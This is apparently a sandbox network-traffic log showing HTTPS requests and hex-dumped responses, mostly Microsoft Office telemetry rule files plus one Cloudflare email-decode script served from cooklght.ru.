                                                                            2024-10-28 08:37:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            48192.168.2.44981513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:04 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:04 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 407
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                            ETag: "0x8DC582B9698189B"
                                                                            x-ms-request-id: e4cbed29-601e-0002-4328-26a786000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083704Z-r197bdfb6b46kmj4701qkq602400000003sg000000006znv
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            49192.168.2.44981313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:04 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:04 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 486
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                            ETag: "0x8DC582BB344914B"
                                                                            x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083704Z-16849878b78fkwcjkpn19c5dsn00000003sg000000008rqz
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:04 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            50192.168.2.44981413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:04 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:04 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 486
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                            ETag: "0x8DC582B9018290B"
                                                                            x-ms-request-id: f6d6c722-a01e-00ab-371c-289106000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083704Z-15b8d89586f5s5nz3ffrgxn5ac00000005e0000000003nd9
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:04 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            51192.168.2.449817104.21.91.1454431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:04 UTC397OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                            Host: cooklght.ru
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:05 UTC750INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:05 GMT
                                                                            Content-Type: application/javascript
                                                                            Content-Length: 1239
                                                                            Connection: close
                                                                            Last-Modified: Tue, 22 Oct 2024 20:47:58 GMT
                                                                            ETag: "67180f7e-4d7"
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAOi5rwEyhkgP0O7EepuKkMSPda92gmgWnL7WqNo7rn0IKq3HqSqW3sc0un4sK2WMQ3NpBR5n5Dc2Reo2JQ8Lu05TB4oNz4wpZfg1%2BL7yxT5lRfsEE76z%2Fy6lhvi%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a128e0a6b77-DFW
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            Expires: Wed, 30 Oct 2024 08:37:05 GMT
                                                                            Cache-Control: max-age=172800
                                                                            Cache-Control: public
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:05 UTC619INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                            Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                            2024-10-28 08:37:05 UTC620INData Raw: 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75
                                                                            Data Ascii: a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.qu


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            52192.168.2.44982013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:05 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:05 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:05 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 464
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                            x-ms-request-id: 860a7776-a01e-00ab-0afb-289106000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083705Z-r197bdfb6b48v72xb403uy6hns0000000560000000009mnx
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:05 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            53192.168.2.44981913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:05 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:05 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:05 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 415
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                            ETag: "0x8DC582BA41997E3"
                                                                            x-ms-request-id: 77b1f39f-101e-0079-106b-275913000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083705Z-15b8d89586fxdh48qknu9dqk2g00000008p0000000007b9z
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:05 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            54192.168.2.44982113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:05 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:05 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:05 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 469
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                            ETag: "0x8DC582BBA701121"
                                                                            x-ms-request-id: 2fd6bd5d-d01e-007a-394f-26f38c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083705Z-16849878b78wc6ln1zsrz6q9w800000004cg00000000bdb4
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:05 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            55192.168.2.44982213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:05 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:05 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:05 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 494
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                            ETag: "0x8DC582BB7010D66"
                                                                            x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083705Z-16849878b78p8hrf1se7fucxk800000005m000000000a8nr
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:05 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            56192.168.2.44981813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:05 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:05 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:05 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 477
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                            x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083705Z-16849878b78j5kdg3dndgqw0vg00000006kg000000001z8p
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            57192.168.2.44982513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:06 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:06 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 419
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                            ETag: "0x8DC582B9748630E"
                                                                            x-ms-request-id: cfe50472-201e-00aa-2cfd-263928000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083706Z-17c5cb586f6mhqqb91r8trf2c800000005gg00000000975r
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
